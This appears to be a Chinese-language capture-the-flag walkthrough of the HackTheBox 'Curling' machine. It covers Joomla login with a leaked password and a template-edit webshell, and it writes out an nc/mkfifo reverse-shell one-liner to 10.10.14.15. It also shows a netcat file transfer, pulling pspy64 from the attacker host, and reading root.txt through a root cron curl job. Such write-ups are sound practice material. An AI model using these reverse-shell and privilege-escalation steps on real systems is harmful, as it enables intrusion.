基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap -sC -sV 10.10.10.150
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 15:25 CST
Nmap scan report for 10.10.10.150
Host is up (0.068s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.60 seconds

80

是一个joomla,页面信息得到一个用户名,Floris,页面注释里secret.txt得到一个密码:

secret.txt

1
2
3
4
Q3VybGluZzIwMTgh

$ echo 'Q3VybGluZzIwMTgh' | base64 -d
Curling2018!

Joomla

然后使用上面得到的用户名密码可以登录Joomla:

1
Floris : Curling2018!

这里出错也不影响后面操作:

webshell

就是编辑模板文件吗,修改php代码:

Extentions > Templates > Templates > Protosta:

reverse shell

注意编码,主要是&编码为%26:

1
2
3
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.15 4445 >/tmp/f

python3 -c "import pty;pty.spawn('/bin/bash')"

用户信息

当前是www-data用户,需要到floris用户,在/home/floris目录有个password_backup文件,下载下来分析处理:

1
2
nc -lvvp 4446 > password_backup
nc 10.10.14.15 4446 < password_backup

查看password_backup是hexdump,后面就是查看内容,确认格式,解码流程(繁琐的流程,Cyberchef大法好):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ cat password_backup | xxd -r > bak
$ file bak
bak: bzip2 compressed data, block size = 900k
$ bzip2 -d bak
bzip2: Can't guess original name for bak -- using bak.out
$ file bak.out
bak.out: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size modulo 2^32 141
$ mv bak.out bak.gz
$ gzip -d bak.gz
$ file bak
bak: bzip2 compressed data, block size = 900k
$ bzip2 -d bak
bzip2: Can't guess original name for bak -- using bak.out
$ file bak.out
bak.out: POSIX tar archive (GNU)
$ tar xf bak.out
$ cat password.txt
5d<wdCbdZu)|hChXll

user flag

得到的密码就是floris用户密码,直接ssh登录,得到user.txt:

提权信息

1
2
3
wget http://10.10.14.15:7777/pspy64
chmod +x pspy64
./pspy64

admin-area目录里有input和report,看起来report就是input里给出的地址的内容,并且pspy64结果显示是root定时通过curl读取input,将结果写入到report:

并且查看input和outout都是我们可写的,那么就可以任意读写文件

root flag

只需要修改input,即可在report中看到root flag:

1
url = "file:///root/root.txt"

参考资料